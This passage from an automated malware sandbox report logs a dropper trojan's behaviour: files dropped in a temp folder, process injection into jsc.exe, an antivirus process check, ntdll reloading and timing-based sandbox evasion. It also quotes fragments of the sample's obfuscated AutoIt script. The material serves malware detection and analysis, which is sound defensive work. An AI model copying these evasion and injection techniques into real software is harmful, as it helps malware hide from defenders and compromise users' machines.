          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\waitfor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"
          Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbs source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ServiceModel.pdbKv source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbP source: jsc.exe, 00000013.00000002.2413035334.000000000115A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: xBCzEiVyOcVH.dll.10.dr
          Source: Binary string: wntdll.pdb source: xBCzEiVyOcVH.dll.10.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbt source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.000000000114C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004067E3 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetWindow,0_2_004067E3
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: section name: RT
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: section name: .mrdata
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: section name: .00cfg
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004142E9 push ecx; ret 0_2_004142FC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00413EFC push eax; ret 0_2_00413F1A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00978B75 push ecx; ret 10_2_00978B88
          Source: xBCzEiVyOcVH.dll.10.drStatic PE information: section name: .text entropy: 6.844715065913507

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\7ZIPSFX.000\XBCZEIVYOCVH.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,10_2_009D59B3
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00965EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00965EDA
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_009733B7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 13A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_10-99471
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-7917
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_10-97722
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifAPI coverage: 5.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 7580Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000c6h], 0004h and CTI: jne 00404B4Ah0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cah], 000bh and CTI: jne 00404B70h0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cch], ax and CTI: je 00405F43h0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000c6h], 0019h and CTI: jne 00404B70h0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cah], 0006h and CTI: jne 00404B70h0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00404AEB GetLocalTime followed by cmp: cmp word ptr [ebp-000000cch], ax and CTI: je 00405F43h0_2_00404AEB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00403287 FindFirstFileW,FindClose,SetLastError,CompareFileTime,0_2_00403287
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00402C10 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402C10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_00402D2D FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,0_2_00402D2D
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009B4005
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_009B494A
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_009B3CE2
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_009BC2FF
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_009BCD9F
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BCD14 FindFirstFileW,FindClose,10_2_009BCD14
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_009BF5D8
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_009BF735
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_009BFA36
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00965D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00965D13
          Source: jsc.exe, 00000013.00000002.2413035334.0000000001132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
          Source: Rarissima.exe.pif, 0000000A.00000003.1748202752.0000000001105000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1748731778.0000000001157000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1747680237.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749052087.0000000001161000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749444084.0000000001170000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1748565407.0000000001131000.00000004.00000020.00020000.00000000.sdmp, Inclina.tmp.0.drBinary or memory string: $SOMRYkBrHgFSadoimWqgKya = '698861197740405166678069256050785232686638371'
          Source: Inclina.tmp.0.drBinary or memory string: $kCMoQuvMCIRwpguFf = 2112+3591
          Source: Rarissima.exe.pif, 0000000A.00000003.1752519900.00000000038D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KCMOQUVMCIRWPGUFF
          Source: Inclina.tmp.0.drBinary or memory string: While $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG < 27
          Source: Rarissima.exe.pif, 0000000A.00000003.1752519900.00000000038D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KCMOQUVMCIRWPGUFFgC7`A
          Source: Rarissima.exe.pif, 0000000A.00000003.1751439433.0000000003B0C000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1751756327.0000000003B0C000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1751294677.0000000003B05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SOMRYKBRHGFSADOIMWQGKYA
          Source: Inclina.tmp.0.drBinary or memory string: $kCMoQuvMCIRwpguFf = Execute('Ptr(324)')
          Source: Rarissima.exe.pif, 0000000A.00000003.1747609397.00000000010C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $kCMoQuvMCIRwpguFf = Execute('Ptr(324)')e
          Source: Rarissima.exe.pif, 0000000A.00000003.1747609397.00000000010C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $kCMoQuvMCIRwpguFf = 2112+35911
          Source: Inclina.tmp.0.drBinary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG + 1
          Source: Rarissima.exe.pif, 0000000A.00000003.1749444084.0000000001194000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG + 1|
          Source: Inclina.tmp.0.drBinary or memory string: $yGTDOXIgXJVyDEaErPcBPFWhzsaXZBDnCppgwWQzkQnyoAYgZZVVmCimJG = 0
          Source: Rarissima.exe.pif, 0000000A.00000003.1750905001.0000000003BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YGTDOXIGXJVYDEAERPCBPFWHZSAXZBDNCPPGWWQZKQNYOAYGZZVVMCIMJG
          Source: Rarissima.exe.pif, 0000000A.00000003.1750480379.0000000003DD6000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000002.1758914723.0000000003DD6000.00000004.00000020.00020000.00000000.sdmp, Rarissima.exe.pif, 0000000A.00000003.1749762496.0000000003DC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifAPI call chain: ExitProcess graph end nodegraph_10-97724
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_009C45D5 BlockInput,10_2_009C45D5
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00965240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00965240
          Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pifCode function: 10_2_00985CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,10_2_00985CAC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exeCode function: 0_2_004067E3 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetWindow,0_2_004067E3
